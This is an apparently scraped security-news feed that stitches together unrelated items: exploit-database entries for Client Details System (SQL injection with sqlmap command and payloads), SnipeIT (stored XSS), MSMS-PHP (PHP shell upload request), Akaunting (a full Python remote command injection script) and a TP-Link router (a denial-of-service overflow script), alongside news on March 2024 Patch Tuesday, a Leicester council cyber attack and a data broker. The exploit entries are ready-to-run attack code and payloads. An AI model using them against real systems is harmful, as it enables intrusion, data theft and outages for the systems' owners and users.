Client Details System version 1.0 suffers from a remote SQL injection vulnerability.

    + **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1+ **Date:** 2023-26-12+ **Exploit Author:** Hamdi Sevben+ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/+ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip+ **Version:** 1.0+ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53+ **CVE:** CVE-2023-7137## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140+ https://www.cve.org/CVERecord?id=CVE-2023-7137+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137+ https://nvd.nist.gov/vuln/detail/CVE-2023-7137## Description:Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data,  or exploit latest vulnerabilities in the underlying database.## Proof of Concept:+ Go to the User Login page: "http://localhost/clientdetails/"+ Fill email and password.+ Intercept the request via Burp Suite and send to Repeater.+ Copy and paste the request to a "r.txt" file.+ Captured Burp request:```POST /clientdetails/ HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 317Content-Type: application/x-www-form-urlencodedReferer: http://localhost/clientdetails/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36uemail=user@mail.com&login=LOG+IN&password=P@ass123```+ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. ```python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db``````---Parameter: uemail (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123    Type: UNION query    Title: Generic UNION query (NULL) - 7 columns    Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123---[14:58:11] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.53, PHP, PHP 8.1.6back-end DBMS: MySQL >= 5.0 (MariaDB fork)[14:58:11] [INFO] fetching current databasecurrent database: 'loginsystem'```+ current database: `loginsystem`![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)

Client Details System 1.0 SQL Injection

Microsoft patched 61 vulnerabilities in the March 2024 Patch Tuesday round, including two critical flaws in Hyper-V.

The March 2024 Patch Tuesday update includes patches for 61 Microsoft vulnerabilities. Only two of the vulnerabilities are rated critical and both of these are found in Windows Hyper-V.

Hyper-V is a hardware virtualization product that allows you to run multiple operating systems as virtual machines (VMs) on Windows. A virtual machine is a computer program that emulates a physical computer. A physical “host” computer can run multiple separate “guest” VMs that are isolated from each other, and from the host. The physical resources of the host are allocated to the VMs by a software layer called the hypervisor, which acts an intermediary between the host and guests.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The Hyper-V CVEs patched in this round of updates are:

CVE-2024-21407 is a Windows Hyper-V Remote Code Execution (RCE) vulnerability with a CVSS score of 8.1 out of 10. Microsoft says exploitation is less likely since this vulnerability would require an authenticated attacker on a guest to send specially crafted file operation requests to hardware resources on the VM which could result in remote code execution on the host server.

This means the attacker would need a good deal of information about the specific environment, and to take additional actions prior to exploitation to prepare the target environment.

CVE-2024-21408 is a Windows Hyper-V Denial of Service (DOS) vulnerability with a CVSS score of 5.5 out of 10. This means an attacker could target a host machine from a guest and cause it to crash or stop functioning. However, Microsoft did not provide any additional details on how this DOS could occur.

The attention for Hyper-V is remarkable since only a week earlier, VMware released security updates to fix critical sandbox escape vulnerabilities in VMware ESXi, Workstation, Fusion, and Cloud Foundation. VMware ESXi and Hyper-V are both designed to handle large-scale virtualization deployments.

Another vulnerability worth mentioning is CVE-2024-21334, which has a CVSS score of 9.8 out of 10. It’s an Open Management Infrastructure (OMI) RCE vulnerability that affects System Center Operations Manager (SCOM). SCOM is a set of tools in Microsoft’s System Center for infrastructure monitoring and application performance management. A remote, unauthenticated attacker could exploit this vulnerability by accessing the OMI instance from the internet and sending specially crafted requests to trigger a use-after-free vulnerability.

OMI is an open source technology for environment management software products for Linux and Unix-based systems. The OMI project was set up to implement standards-based management so that every device in the world can be managed in a clear, consistent, and coherent way.

Use-after-free vulnerabilities are the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can exploit the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

Microsoft states that if the Linux machines do not need network listening, OMI incoming ports can be disabled. In other cases, customers running affected versions of SCOM (System Center Operations Manager 2019 and 2022) should update to OMI version 1.8.1-0.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has released security updates to address vulnerabilities in several products:

*   Adobe Experience Manager
*   Adobe Premiere Pro
*   Adobe ColdFusion
*   Adobe Bridge
*   Adobe Lightroom
*   Adobe Animate

The **Android** Security Bulletin for February contains details of security vulnerabilities for patch level 2024-03-05 or later.

**Apple** has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities

**SAP** has released its March 2024 Patch Day updates.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Microsoft Patch Tuesday March 2024 includes critical Hyper-V flaws 

SnipeIT version 6.2.1 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: SnipeIT 6.2.1 - Stored Cross Site ScriptingDate: 06-Oct-2023Exploit Author: Shahzaib Ali KhanVendor Homepage: https://snipeitapp.comSoftware Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1Version: 6.2.1Tested on: Windows 11 22H2 and Ubuntu 20.04CVE: CVE-2023-5452Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting(XSS) feature that allows attackers to execute JavaScript commands. Thelocation endpoint was vulnerable.Steps to Reproduce:1. Login as a standard user [non-admin] > Asset page > List All2. Click to open any asset > Edit Asset3. Create new location and add the payload:<script>alert(document.cookie)</script>4. Now login to any other non-admin or admin > Asset page > List All5. Open the same asset of which you can change the location and the payloadwill get executed.POC Request:POST /api/v1/locations HTTP/1.1Host: localhostContent-Length: 118Accept: */*X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGVX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://localhostReferer: http://localhost/hardware/196/editAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;assetsListingTable.bs.table.cardView=false; laravel_token=eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNMd2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa001MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;XSRF-TOKEN=eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bHFWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3DConnection: closename=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=Thanks,Shahzaib Ali Khan

SnipeIT 6.2.1 Cross Site Scripting

MSMS-PHP version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Description:The upload function and id=cimg parameter are not sanitizing correctly!The attacker can upload any PHP file which he can execute directly onthe server!STATUS: HIGH-CrITICAL Vulnerability[+]Payload:```POSTPOST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1Host: localhostContent-Length: 6318sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarypV7nBYU4nAonvWelX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/mobile_store/admin/?page=system_infoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dgConnection: close------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="name"Mobile Store Management System - PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="short_name"MSMS-PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="about_us"<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:0px; clear: both; border-top: 0px; height: 1px; background-image:linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px-160px; padding: 0px; position: sticky; top: 20px; width: 160px;height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div id="bannerR"style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div class="boxed"style="margin: 10px 28.7969px; padding: 0px; clear: both; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:14px; text-align: center; background-color: rgb(255, 255, 255);"><divid="lipsum" style="margin: 0px; padding: 0px; text-align:justify;"></div></div></div><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsumdolor sit amet, consectetur adipiscing elit. Nullam non ultricestortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenasiaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blanditvulputate magna, non lobortis velit pharetra vel. Morbi sollicitudinlorem sed augue suscipit, eu commodo tortor vulputate. Interdum etmalesuada fames ac ante ipsum primis in faucibus. Pellentesquehabitant morbi tristique senectus et netus et malesuada fames acturpis egestas. Praesent eleifend interdum est, at gravida eratmolestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabituret viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamusporttitor ac risus eu ultricies. Morbi malesuada mi vel luctussagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris atlacus vehicula, aliquam purus quis, pharetra lorem.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Proin consectetur massa ut quam molestie porta. Donecsit amet ligula odio. Class aptent taciti sociosqu ad litora torquentper conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinarac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eublandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifendid, aliquet ut libero. Nunc scelerisque vulputate turpis quisvolutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulumimperdiet, nulla vitae pharetra pretium, magna felis placerat libero,quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorpercursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapienconsectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitaetortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id antevel velit mollis egestas. Suspendisse pretium sem urna, vitae placeratturpis cursus faucibus. Ut dignissim molestie blandit. Phaselluspulvinar, eros id ultricies mollis, lectus velit viverra mi, atvenenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibhfelis. Donec faucibus, nulla at faucibus blandit, mi justo efficiturdui, non mattis nisl purus non lacus. Maecenas vel congue tellus, inconvallis nisi. Curabitur faucibus interdum massa, eu facilisis ligulapretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis idcursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elitultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies nonlorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, atpharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, intincidunt mi. Aliquam sodales aliquam felis, eget tristique felisdictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesquemauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quisimperdiet est. Donec lobortis tortor id neque tempus, vel faucibuslorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristiquenunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitaenisi. Curabitur at quam ut libero convallis mattis vel eget mauris.Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximusnulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrumnon magna at, molestie gravida magna. Aenean neque sapien, volutpat aullamcorper nec, iaculis quis est.</p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="privacy_policy"<p>Sample Privacy Policy<br></p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="img"; filename="info.php"Content-Type: application/octet-stream<?php  phpinfo();?>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="cover"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="banners[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWel--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)## Time spent:00:05:00

MSMS-PHP 1.0 Shell Upload

Apple and Microsoft recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its Windows OS. Meanwhile, Apple's new macOS Sonoma addresses at least 68 security weaknesses, and its latest updates for iOS fixes two zero-day flaws.

**Apple** and **Microsoft** recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its **Windows OS**. Meanwhile, Apple’s new **macOS Sonoma** addresses at least 68 security weaknesses, and its latest update for iOS fixes two zero-day flaws.

Last week, Apple pushed out an urgent software update to its flagship iOS platform, warning that there were at least two zero-day exploits for vulnerabilities being used in the wild (CVE-2024-23225 and CVE-2024-23296). The security updates are available in **iOS 17.4**, **iPadOS 17.4**, and **iOS 16.7.6**.

Apple’s **macOS** **Sonoma 14.4 Security Update** addresses dozens of security issues. **Jason Kitka**, chief information security officer at **Automox**, said the vulnerabilities patched in this update often stem from memory safety issues, a concern that has led to a broader industry conversation about the adoption of memory-safe programming languages \[full disclosure: Automox is an advertiser on this site\].

On Feb. 26, 2024, the Biden administration issued a report that calls for greater adoption of memory-safe programming languages. On Mar. 4, 2024, Google published Secure by Design, which lays out the company’s perspective on memory safety risks.

Mercifully, there do not appear to be any zero-day threats hounding Windows users this month (at least not yet). **Satnam Narang**, senior staff research engineer at **Tenable**, notes that of the 60 CVEs in this month’s Patch Tuesday release, only six are considered “more likely to be exploited” according to Microsoft.

Those more likely to be exploited bugs are mostly “elevation of privilege vulnerabilities” including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System (CimFS), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler).

Narang highlighted CVE-2024-21390 as a particularly interesting vulnerability in this month’s Patch Tuesday release, which is an elevation of privilege flaw in **Microsoft Authenticator**, the software giant’s app for multi-factor authentication. Narang said a prerequisite for an attacker to exploit this flaw is to already have a presence on the device either through malware or a malicious application.

“If a victim has closed and re-opened the Microsoft Authenticator app, an attacker could obtain multi-factor authentication codes and modify or delete accounts from the app,” Narang said. “Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts.”

CVE-2024-21334 earned a CVSS (danger) score of 9.8 (10 is the worst), and it concerns a weakness in **Open Management Infrastructure** (OMI), a Linux-based cloud infrastructure in **Microsoft Azure**. Microsoft says attackers could connect to OMI instances over the Internet without authentication, and then send specially crafted data packets to gain remote code execution on the host device.

CVE-2024-21435 is a CVSS 8.8 vulnerability in Windows OLE, which acts as a kind of backbone for a great deal of communication between applications that people use every day on Windows, said **Ben McCarthy,** lead cybersecurity engineer at **Immersive Labs**.

“With this vulnerability, there is an exploit that allows remote code execution, the attacker needs to trick a user into opening a document, this document will exploit the OLE engine to download a malicious DLL to gain code execution on the system,” Breen explained. “The attack complexity has been described as low meaning there is less of a barrier to entry for attackers.”

A full list of the vulnerabilities addressed by Microsoft this month is available at the SANS Internet Storm Center, which breaks down the updates by severity and urgency.

Finally, Adobe today issued security updates that fix dozens of security holes in a wide range of products, including **Adobe Experience Manager**, **Adobe Premiere Pro**, **ColdFusion 2023** and **2021**, **Adobe Bridge**, **Lightroom**, and **Adobe Animate**. Adobe said it is not aware of active exploitation against any of the flaws.

By the way, Adobe recently enrolled all of its **Acrobat** users into a “new generative AI feature” that scans the contents of your PDFs so that its new “AI Assistant” can  “understand your questions and provide responses based on the content of your PDF file.” Adobe provides instructions on how to disable the AI features and opt out here.

Patch Tuesday, March 2024 Edition

By Waqas
Another day, another cyber attack on a local council in England!
This is a post from HackRead.com Read the original post: Leicester City Council’s IT System and Phones Down Amid Cyber Attack

Leicester City Council grapples with a cyber attack, causing major disruption to residents. IT systems and phone lines remain down as authorities work to restore crucial services. Recovery is expected by midweek.

Leicester City Council continues to face disruption after a cyber attack forced them to shut down IT systems and phone lines last Thursday (March 7, 2024). While the nature of the attack remains undisclosed, officials are working alongside cybersecurity specialists and law enforcement to assess the damage and restore functionality.

“This incident highlights the growing vulnerability of local authorities to cyber threats,” said Richard Sword, strategic director of city developments and neighbourhoods at Leicester City Council. “Our priority is to minimize disruption to critical services and get our systems back online as swiftly as possible.”

The council anticipates a phased recovery process, prioritizing the restoration of essential services by midweek. Residents seeking urgent assistance can utilize the emergency phone lines established on the council’s website.

****Limited Services and Public Frustration****

The shutdown has caused significant inconvenience for residents. Essential services like council tax payments and license renewals are currently unavailable. Local Green Party councillor Patrick Kitterick expressed concern, stating the prolonged outage poses a serious challenge, especially considering the council’s role in civil emergency response.

****Ransomware Attack or Not?****

Since it’s not clear whether the incident was a ransomware attack or a DDoS attack, we reached out to William Wright, CEO of Closed Door Security, for his insights. Given the history of cyber attacks on local councils, William cautioned that this might turn out to be a costly and disruptive ransomware attack.

“We don’t know what type of attack Leicester City Council is suffering from but given the recent spate of ransomware attacks targeting public authorities, it’s likely to be ransomware,” William said.

He warned that the government must take action to tackle the vulnerable situation. “Earlier this week, the government responded to a report from a Parliamentary Committee on ransomware, which said it was not doing enough to keep the country safe from the threat, but the government didn’t agree with the findings, maybe this latest attack on Leicester City Council will act as a wake-up call.”

****Further Developments Expected****

Leicester City Council is expected to provide updates on the situation as progress is made. Residents are encouraged to visit the council’s website for the latest information and alternative contact methods.

This attack comes amidst a concerning trend targeting local government bodies across the UK. The incident also goes on to show the need for basic cybersecurity measures including employee training to protect critical infrastructure from sophisticated cyber threats.

1.  Freecycle Data Breach Impacts 7 Million Users
2.  UK Power and Data Manufacturer Volex Hit by Cyberattack
3.  Anonymous Sudan DDoS Attack on London Internet Exchange
4.  Hackers Attack UK’s Nuclear Waste Services Through LinkedIn
5.  Contractor Database Leaks Irish Police Vehicle Seizure Records

Leicester City Council’s IT System and Phones Down Amid Cyber Attack

Akaunting versions 3.1.3 and below suffer from a remote command execution vulnerability.

    # Exploit Title: Akaunting < 3.1.3 - RCE# Date: 08/02/2024# Exploit Author: u32i@proton.me# Vendor Homepage: https://akaunting.com# Software Link: https://github.com/akaunting/akaunting# Version: <= 3.1.3# Tested on: Ubuntu (22.04)# CVE : CVE-2024-22836#!/usr/bin/python3import sysimport reimport requestsimport argparsedef get_company():  # print("[INF] Retrieving company id...")  res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)  if res.status_code != 302:    print("[ERR] No company id was found!")    sys.exit(3)  cid = res.headers['Location'].split('/')[-1]  if cid == "login":    print("[ERR] Invalid session cookie!")    sys.exit(7)  return ciddef get_tokens(url):  res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)  search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)  if not search_res:    print("[ERR] Couldn't get csrf token")    sys.exit(1)  data = {}  data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')  data['session'] = res.cookies.get('akaunting_session')  return datadef inject_command(cmd):  url = f"{target}/{company_id}/wizard/companies"  tokens = get_tokens(url)  headers.update({"X-Csrf-Token": tokens['csrf_token']})  data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      print("[ERR] Command injection failed!")      sys.exit(4)    print("[INF] Command injected!")def trigger_rce(app, version = "1.0.0"):  print("[INF] Executing the command...")  url = f"{target}/{company_id}/apps/install"  data = {"alias": app, "version": version, "path": f"apps/{app}/download"}  headers.update({"Content-Type":"application/json"})  res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)  if res.status_code == 200:    res_data = res.json()    if res_data['error']:      search_res = re.search(r">Exit Code\:.*<", res_data['message'])      if search_res:        print("[ERR] Failed to execute the command")        sys.exit(6)      print("[ERR] Failed to install the app! no command was executed!")      sys.exit(5)    print("[INF] Executed successfully!")def login(email, password):  url = f"{target}/auth/login"  tokens = get_tokens(url)  cookies.update({    'akaunting_session': tokens['session']  })  data = {    "_token": tokens['csrf_token'],    "_method": "POST",    "email": email,    "password": password  }    req = requests.post(url, headers=headers, cookies=cookies, data=data)  res = req.json()  if res['error']:    print("[ERR] Failed to log in!")    sys.exit(8)  print("[INF] Logged in")  cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})    def main():  inject_command(args.command)  trigger_rce(args.alias, args.version)if __name__=='__main__':  parser = argparse.ArgumentParser()  parser.add_argument("-u", "--url", help="target url")  parser.add_argument("--email", help="user login email.")  parser.add_argument("--password", help="user login password.")  parser.add_argument("-i", "--id", type=int, help="company id (optional).")  parser.add_argument("-c", "--command", help="command to execute.")  parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")  parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")  args = parser.parse_args()    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}  cookies = {}  target = args.url  try:    login(args.email, args.password)    company_id = get_company() if not args.id else args.id    main()  except:    sys.exit(0)

Akaunting 3.1.3 Remote Command Execution

There exists a buffer overflow vulnerability in the TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request.

    # Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'# Date: 8/12/2023# Exploit Author: Anish Feroz (ZEROXINN)# Vendor Homepage: http://www.tp-link.com# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: TP-Link TL-WR740N#Description:#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.#Usage:#python3 target username password#change port, if required------------------------------------------------POC-----------------------------------------#!/usr/bin/pythonimport requestsfrom requests.auth import HTTPBasicAuthimport base64def send_request(ip, username, password):    auth_url = f"http://{ip}:8082"    target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"    credentials = f"{username}:{password}"    encoded_credentials = base64.b64encode(credentials.encode()).decode()    headers = {        "Host": f"{ip}:8082",        "Authorization": f"Basic {encoded_credentials}",        "Upgrade-Insecure-Requests": "1",        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "en-US,en;q=0.9",        "Connection": "close"    }    session = requests.Session()        response = session.get(target_url, headers=headers)    if response.status_code == 200:        print("Server Crashed")        print(response.text)    else:        print(f"Script Completed with status code {response.status_code}")ip_address = input("Enter IP address of the host: ")username = input("Enter username: ")password = input("Enter password: ")send_request(ip_address, username, password)

TP-Link TL-WR740N Buffer Overflow / Denial Of Service

If you live in the United States, the data broker Radaris likely knows a great deal about you, and they are happy to sell what they know to anyone. But how much do we know about Radaris? Publicly available data indicates that in addition to running a dizzying array of people-search websites, the co-founders of Radaris operate multiple Russian-language dating services and affiliate programs. It also appears many of their businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.

A Close Up Look at the Consumer Data Broker Radaris

By Owais Sultan
In today’s era of remote work and travel, having the right technology can make all the difference for…
This is a post from HackRead.com Read the original post: Apple Tech Must Haves For Digital Nomads

